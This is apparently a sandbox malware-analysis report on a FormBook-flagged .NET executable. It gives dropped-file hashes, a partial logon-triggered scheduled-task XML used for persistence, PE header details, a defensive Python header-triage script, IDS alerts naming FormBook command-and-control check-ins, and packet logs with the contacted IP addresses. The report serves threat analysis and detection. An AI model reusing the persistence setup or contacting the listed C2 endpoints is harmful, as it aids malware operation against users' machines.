                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1642
                                            Entropy (8bit):5.193011313049836
                                            Encrypted:false
                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbh47TlNQ//rydbz9I3YODOLNdq32
                                            MD5:CD336816B8CEB455A42F961A8F08D0D7
                                            SHA1:E6C59289EB46C0E12240D674A4230F83A632ABEB
                                            SHA-256:4056571BCD25053290D7350F6A47757771FED7F84F5C1A5B0EFAB382FBD56217
                                            SHA-512:9A2B4A596DF487B296618B1CD05A8EF0AA83216A480A0F5C9E5D708DC7B62D71321D3E6E16BA291202E0F7D212E11194334EA6A20CB4B3BC77751854CE0560A8
Malicious:true
Note: the task definition below registers a logon trigger for computer\user, running as that user's interactive token at LeastPrivilege (no elevation). The RegistrationInfo date (2014-10-25) is a static value carried in the XML, not the time the file was written during this analysis. The preview is cut off before the <Actions> element, so the command the task executes is not visible in this report.
                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                            C:\Users\user\AppData\Roaming\HpnpObXJP.exe
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):548352
                                            Entropy (8bit):7.150010822520698
                                            Encrypted:false
                                            SSDEEP:12288:MWHCM2K4C2+XhqZ5G8n1wI1Sazqyjxg5QLN:83C2+xqm8l9zqyFgiL
                                            MD5:F8146A71DEDC3EEEAA1624D6832C39A4
                                            SHA1:B1007A3BEAB21C77513BB9C4E6FC2A04C6346C04
                                            SHA-256:3611C1A2E9D1897825D5E7100A1C01D807F62A9C75D5F12602C168B0726D56CA
                                            SHA-512:EB4D38153E98FB9744B2AB9496E8A084E83C0202639823B2DE5FCDA7609221918D2615AD572F007C0F4A62D363E2362936B585BE1E09462FA299DFAC69FC2654
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Note: MD5, SHA1 and SHA-256 match the submitted sample exactly; this is a byte-for-byte self-copy placed under %AppData%, consistent with the scheduled-task persistence flagged in the signatures, not a second-stage payload.
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0..T...........r... ........@.. ....................................@.................................pr..O...................................Tr............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................r......H........?...^......o...L...............................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........ro..p.+..*..0..................+..*".(.....*....0..
                                            C:\Users\user\AppData\Roaming\HpnpObXJP.exe:Zone.Identifier
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
Preview: [ZoneTransfer]....ZoneId=0
Note: ZoneId=0 is the Local Machine zone, so the dropped copy carries no Mark-of-the-Web and will not trigger SmartScreen or attachment-execution prompts when launched.

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.150010822520698
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:tgamf4XuLa.exe
                                            File size:548352
                                            MD5:f8146a71dedc3eeeaa1624d6832c39a4
                                            SHA1:b1007a3beab21c77513bb9c4e6fc2a04c6346c04
                                            SHA256:3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
                                            SHA512:eb4d38153e98fb9744b2ab9496e8a084e83c0202639823b2de5fcda7609221918d2615ad572f007c0f4a62d363e2362936b585be1e09462fa299dfac69fc2654
                                            SSDEEP:12288:MWHCM2K4C2+XhqZ5G8n1wI1Sazqyjxg5QLN:83C2+xqm8l9zqyFgiL
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0..T...........r... ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4872c2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x960770CE [Tue Oct 5 18:07:10 2049 UTC] (a date after the analysis: .NET compilers in deterministic mode store a hash-derived value in this field, so it cannot be used to date the build)
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(the remaining preview bytes are 0x00 padding, which the disassembler renders as add byte ptr [eax], al)
0x402000 is the IAT entry (IMAGE_DIRECTORY_ENTRY_IAT at RVA 0x2000, in .text) holding the pointer to mscoree.dll!_CorExeMain, the image's only native import. This is the standard native stub of a managed executable: the real code is CIL reached through the CLR header at RVA 0x2008 (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR), so the entrypoint bytes say nothing about the payload.

                                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x87270 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x88000 | 0x5a4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x87254 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x852c8 | 0x85400 | False | 0.75722986046 | data | 7.16093944862 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x88000 | 0x5a4 | 0x600 | False | 0.419270833333 | data | 4.05521631132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
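The header fields above are the ones worth checking by hand on a suspicious PE: a non-empty COM_DESCRIPTOR directory marks a managed image (the native entry point is only a jmp to mscoree!_CorExeMain), a link timestamp after the analysis date cannot be a real build time, and an executable section with entropy above 7 bits per byte usually holds packed or encrypted content, as .text does here (7.16). The following Python is an added example, not Joe Sandbox output or code from the sample: it parses a PE32 header with struct, computes per-section entropy, and applies those checks plus an ASLR flag check. The image it parses is constructed in build_sample_image() with header values copied from this report (entry point, image base, timestamp, DLL characteristics, data directories, section layout); the section contents are synthetic filler, so the entropy values are not the real sample's.

```python
"""Parse a PE32 header and apply the static checks a sandbox report surfaces.

Added example; not Joe Sandbox code. The image parsed here is built in
build_sample_image() with header values from the report and synthetic section bytes.
"""
import math
import struct
from collections import namedtuple
from datetime import datetime, timezone

DATA_DIRS = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
             "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
             "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040

Section = namedtuple("Section", "name vaddr vsize rawsize rawptr characteristics entropy")
PEInfo = namedtuple("PEInfo", "machine timestamp entry_rva image_base dll_characteristics dirs sections")


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant run, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(buf):
    """Walk DOS header -> PE signature -> file header -> optional header -> section table."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte file header
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    entry_rva = struct.unpack_from("<I", buf, opt + 16)[0]
    image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", buf, opt + 70)[0]
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = {DATA_DIRS[i]: struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(min(ndirs, 16))}
    sections = []
    for i in range(nsec):                    # section table starts right after the optional header
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        raw = buf[rawptr:rawptr + rawsize]
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vaddr, vsize, rawsize, rawptr, chars, shannon_entropy(raw)))
    return PEInfo(machine, timestamp, entry_rva, image_base, dll_chars, dirs, sections)


def triage(info, now=None):
    """Findings an analyst would note from the header alone."""
    now = now or datetime.now(timezone.utc)
    findings = []
    if info.dirs.get("COM_DESCRIPTOR", (0, 0))[1]:
        findings.append("managed (.NET) image: CLR header present, native entry is a jmp to mscoree!_CorExeMain")
    built = datetime.fromtimestamp(info.timestamp, tz=timezone.utc)
    if built > now:
        findings.append(f"link timestamp {built:%Y-%m-%d} is in the future: hash-derived or forged, not a build date")
    for s in info.sections:
        if s.characteristics & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE) and s.entropy > 7.0:
            findings.append(f"executable section {s.name} has entropy {s.entropy:.2f}: packed or encrypted content")
    if not info.dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        findings.append("DYNAMIC_BASE not set: no ASLR")
    return findings


def build_sample_image():
    """Constructed PE32 (not the real sample): header values from the report, synthetic section bytes."""
    secs = [(b".text", 0x2000, bytes(range(256)) * 4, 0x60000020),   # every byte value x4 -> entropy 8.0
            (b".rsrc", 0x88000, b"\0" * 0x200, 0x40000040),
            (b".reloc", 0x8A000, b"\0" * 0x200, 0x42000040)]
    hdr = bytearray(0x200)
    hdr[0:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                  # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(secs), 0x960770CE, 0, 0, 224, 0x0102)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                                  # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x872C2)                           # entry RVA: 0x4872c2 - image base
    struct.pack_into("<I", hdr, opt + 28, 0x400000)                          # image base
    struct.pack_into("<II", hdr, opt + 32, 0x2000, 0x200)                    # section / file alignment
    struct.pack_into("<HH", hdr, opt + 68, 2, 0x8540)                        # GUI; NO_SEH|TS_AWARE|DYNAMIC_BASE|NX_COMPAT
    struct.pack_into("<I", hdr, opt + 92, 16)                                # NumberOfRvaAndSizes
    for idx, (rva, size) in {1: (0x87270, 0x4F), 12: (0x2000, 8), 14: (0x2008, 0x48)}.items():
        struct.pack_into("<II", hdr, opt + 96 + 8 * idx, rva, size)          # IMPORT, IAT, COM_DESCRIPTOR
    body, rawptr = bytearray(), len(hdr)
    for i, (name, vaddr, data, chars) in enumerate(secs):
        struct.pack_into("<8sIIIIIIHHI", hdr, opt + 224 + 40 * i,
                         name, len(data), vaddr, len(data), rawptr, 0, 0, 0, 0, chars)
        body += data
        rawptr += len(data)
    return bytes(hdr + body)


if __name__ == "__main__":
    pe = parse_pe32(build_sample_image())
    for s in pe.sections:
        print(f"{s.name:<8} va=0x{s.vaddr:x} raw=0x{s.rawsize:x} entropy={s.entropy:.2f}")
    for finding in triage(pe):
        print("-", finding)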

                                            Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x88090 | 0x314 | data | - | -
RT_MANIFEST | 0x883b4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | - | -

                                            Imports

DLL | Import
mscoree.dll | _CorExeMain

                                            Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2019
Assembly Version | 1.0.0.0
InternalName | Formatt.exe
FileVersion | 1.0.0.0
CompanyName | (empty)
LegalTrademarks | (empty)
Comments | (empty)
ProductName | Disciples
ProductVersion | 1.0.0.0
FileDescription | Disciples
OriginalFilename | Formatt.exe

                                            Network Behavior

                                            Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/15/21-10:09:58.335857 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49780 | 80 | 192.168.2.3 | 52.25.92.0
09/15/21-10:09:58.335857 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49780 | 80 | 192.168.2.3 | 52.25.92.0
09/15/21-10:09:58.335857 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49780 | 80 | 192.168.2.3 | 52.25.92.0
09/15/21-10:10:03.777625 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49781 | 99.83.154.118 | 192.168.2.3
09/15/21-10:10:08.965113 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49782 | 34.98.99.30 | 192.168.2.3
09/15/21-10:10:14.181255 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49787 | 34.98.99.30 | 192.168.2.3
09/15/21-10:10:30.286043 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.3 | 34.102.136.180
09/15/21-10:10:30.286043 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.3 | 34.102.136.180
09/15/21-10:10:30.286043 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.3 | 34.102.136.180
09/15/21-10:10:30.401585 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49790 | 34.102.136.180 | 192.168.2.3
09/15/21-10:10:40.511246 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.2.3 | 99.83.154.118
09/15/21-10:10:40.511246 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.2.3 | 99.83.154.118
09/15/21-10:10:40.511246 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.2.3 | 99.83.154.118
09/15/21-10:10:40.680718 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49791 | 99.83.154.118 | 192.168.2.3
09/15/21-10:10:45.754266 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49792 | 80 | 192.168.2.3 | 34.98.99.30
09/15/21-10:10:45.754266 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49792 | 80 | 192.168.2.3 | 34.98.99.30
09/15/21-10:10:45.754266 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49792 | 80 | 192.168.2.3 | 34.98.99.30
09/15/21-10:10:45.871161 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49792 | 34.98.99.30 | 192.168.2.3
09/15/21-10:10:50.931049 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.3 | 91.195.240.94
09/15/21-10:10:50.931049 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.3 | 91.195.240.94
09/15/21-10:10:50.931049 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.3 | 91.195.240.94

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 10:09:58.142708063 CEST | 49780 | 80 | 192.168.2.3 | 52.25.92.0
Sep 15, 2021 10:09:58.335076094 CEST | 80 | 49780 | 52.25.92.0 | 192.168.2.3
Sep 15, 2021 10:09:58.335562944 CEST | 49780 | 80 | 192.168.2.3 | 52.25.92.0
Sep 15, 2021 10:09:58.335856915 CEST | 49780 | 80 | 192.168.2.3 | 52.25.92.0
Sep 15, 2021 10:09:58.520380974 CEST | 80 | 49780 | 52.25.92.0 | 192.168.2.3
Sep 15, 2021 10:09:58.520955086 CEST | 80 | 49780 | 52.25.92.0 | 192.168.2.3
Sep 15, 2021 10:09:58.520979881 CEST | 80 | 49780 | 52.25.92.0 | 192.168.2.3
Sep 15, 2021 10:09:58.521400928 CEST | 80 | 49780 | 52.25.92.0 | 192.168.2.3
Sep 15, 2021 10:09:58.524154902 CEST | 49780 | 80 | 192.168.2.3 | 52.25.92.0
Sep 15, 2021 10:09:58.524269104 CEST | 49780 | 80 | 192.168.2.3 | 52.25.92.0
Sep 15, 2021 10:09:58.708976984 CEST | 80 | 49780 | 52.25.92.0 | 192.168.2.3
Sep 15, 2021 10:10:03.599700928 CEST | 49781 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:03.618251085 CEST | 80 | 49781 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:03.618488073 CEST | 49781 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:03.618793011 CEST | 49781 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:03.637415886 CEST | 80 | 49781 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:03.777625084 CEST | 80 | 49781 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:03.777683973 CEST | 80 | 49781 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:03.779618979 CEST | 49781 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:03.779794931 CEST | 49781 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:03.800842047 CEST | 80 | 49781 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:08.829628944 CEST | 49782 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:08.848478079 CEST | 80 | 49782 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:08.849801064 CEST | 49782 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:08.849975109 CEST | 49782 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:08.868742943 CEST | 80 | 49782 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:08.965112925 CEST | 80 | 49782 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:08.965140104 CEST | 80 | 49782 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:08.965301991 CEST | 49782 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:08.965415001 CEST | 49782 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:09.265618086 CEST | 49782 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:09.284578085 CEST | 80 | 49782 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:14.041023016 CEST | 49787 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:14.065136909 CEST | 80 | 49787 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:14.065464973 CEST | 49787 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:14.066011906 CEST | 49787 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:14.085696936 CEST | 80 | 49787 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:14.181255102 CEST | 80 | 49787 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:14.181319952 CEST | 80 | 49787 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:14.181651115 CEST | 49787 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:14.181672096 CEST | 49787 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:14.484749079 CEST | 49787 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:14.503680944 CEST | 80 | 49787 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:19.233666897 CEST | 49788 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:19.252449989 CEST | 80 | 49788 | 91.195.240.94 | 192.168.2.3
Sep 15, 2021 10:10:19.252635002 CEST | 49788 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:19.252830982 CEST | 49788 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:19.272996902 CEST | 80 | 49788 | 91.195.240.94 | 192.168.2.3
Sep 15, 2021 10:10:19.290005922 CEST | 80 | 49788 | 91.195.240.94 | 192.168.2.3
Sep 15, 2021 10:10:19.290040016 CEST | 80 | 49788 | 91.195.240.94 | 192.168.2.3
Sep 15, 2021 10:10:19.290277958 CEST | 49788 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:19.290385962 CEST | 49788 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:19.310718060 CEST | 80 | 49788 | 91.195.240.94 | 192.168.2.3
Sep 15, 2021 10:10:24.503412008 CEST | 49789 | 80 | 192.168.2.3 | 103.72.144.19
Sep 15, 2021 10:10:24.817097902 CEST | 80 | 49789 | 103.72.144.19 | 192.168.2.3
Sep 15, 2021 10:10:24.817893982 CEST | 49789 | 80 | 192.168.2.3 | 103.72.144.19
Sep 15, 2021 10:10:24.818169117 CEST | 49789 | 80 | 192.168.2.3 | 103.72.144.19
Sep 15, 2021 10:10:25.132307053 CEST | 80 | 49789 | 103.72.144.19 | 192.168.2.3
Sep 15, 2021 10:10:25.132343054 CEST | 80 | 49789 | 103.72.144.19 | 192.168.2.3
Sep 15, 2021 10:10:25.132352114 CEST | 80 | 49789 | 103.72.144.19 | 192.168.2.3
Sep 15, 2021 10:10:25.135516882 CEST | 49789 | 80 | 192.168.2.3 | 103.72.144.19
Sep 15, 2021 10:10:25.135601997 CEST | 49789 | 80 | 192.168.2.3 | 103.72.144.19
Sep 15, 2021 10:10:25.454338074 CEST | 80 | 49789 | 103.72.144.19 | 192.168.2.3
Sep 15, 2021 10:10:30.264316082 CEST | 49790 | 80 | 192.168.2.3 | 34.102.136.180
Sep 15, 2021 10:10:30.285715103 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.3
Sep 15, 2021 10:10:30.285825014 CEST | 49790 | 80 | 192.168.2.3 | 34.102.136.180
Sep 15, 2021 10:10:30.286042929 CEST | 49790 | 80 | 192.168.2.3 | 34.102.136.180
Sep 15, 2021 10:10:30.310519934 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.3
Sep 15, 2021 10:10:30.401585102 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.3
Sep 15, 2021 10:10:30.401640892 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.3
Sep 15, 2021 10:10:30.401880026 CEST | 49790 | 80 | 192.168.2.3 | 34.102.136.180
Sep 15, 2021 10:10:30.401911974 CEST | 49790 | 80 | 192.168.2.3 | 34.102.136.180
Sep 15, 2021 10:10:30.707046032 CEST | 49790 | 80 | 192.168.2.3 | 34.102.136.180
Sep 15, 2021 10:10:30.726382971 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.3
Sep 15, 2021 10:10:40.488914013 CEST | 49791 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:40.510979891 CEST | 80 | 49791 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:40.511141062 CEST | 49791 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:40.511245966 CEST | 49791 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:40.532310963 CEST | 80 | 49791 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:40.680717945 CEST | 80 | 49791 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:40.680741072 CEST | 80 | 49791 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:40.681369066 CEST | 49791 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:40.681411982 CEST | 49791 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:40.697202921 CEST | 80 | 49791 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:40.700391054 CEST | 49791 | 80 | 192.168.2.3 | 99.83.154.118
Sep 15, 2021 10:10:40.705658913 CEST | 80 | 49791 | 99.83.154.118 | 192.168.2.3
Sep 15, 2021 10:10:45.731671095 CEST | 49792 | 80 | 192.168.2.3 | 34.98.99.30
